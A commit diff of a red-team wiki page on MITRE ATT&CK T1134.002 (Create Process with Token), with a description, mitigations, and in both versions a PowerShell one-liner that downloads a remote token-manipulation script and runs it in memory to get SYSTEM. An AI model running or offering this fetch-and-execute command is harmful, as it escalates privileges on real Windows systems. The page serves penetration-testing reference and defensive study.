everything/everything-active-directory/access-token-manipultion/create-process-with-token.md, before:

---
description: https://attack.mitre.org/techniques/T1134/002/
---

# 🔨 Create Process with Token

### T1134.002: Create Process with Token

**Permissions Required: **<mark style="color:red;">**Administrator**</mark>** | **<mark style="color:green;">**User**</mark>

**Description**

Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as `CreateProcessWithTokenW` and `runas`.

Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as Token Impersonation/Theft or Make and Impersonate Token).

[\[Source\]](https://attack.mitre.org/techniques/T1134/002/)

## Techniques

### WinPWN

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
```

Commit message:

GitBook: [#2682] Create or Modify System Process

everything/everything-active-directory/access-token-manipultion/create-process-with-token.md, after:

---
description: https://attack.mitre.org/techniques/T1134/002/
---

# 🔨 Create Process with Token

### T1134.002: Create Process with Token

**Permissions Required: **<mark style="color:red;">**Administrator**</mark>** | **<mark style="color:green;">**User**</mark>

**Description**

Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as `CreateProcessWithTokenW` and `runas`.

Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as Token Impersonation/Theft or Make and Impersonate Token).

[\[Source\]](https://attack.mitre.org/techniques/T1134/002/)

## Techniques

### Get-WinLogonTokenSystem

```powershell
iex(iwr -usebasicparsing "https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1");Get-WinLogonTokenSystem
```

## Scenario

```
// Some code
```

## Mitigation

* Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration > \[Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object. Also define who can create a process level token to only the local and network service through GPO: Computer Configuration > \[Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token.
* Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas`.
* An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.

## Further Reading

```
// Some code
```
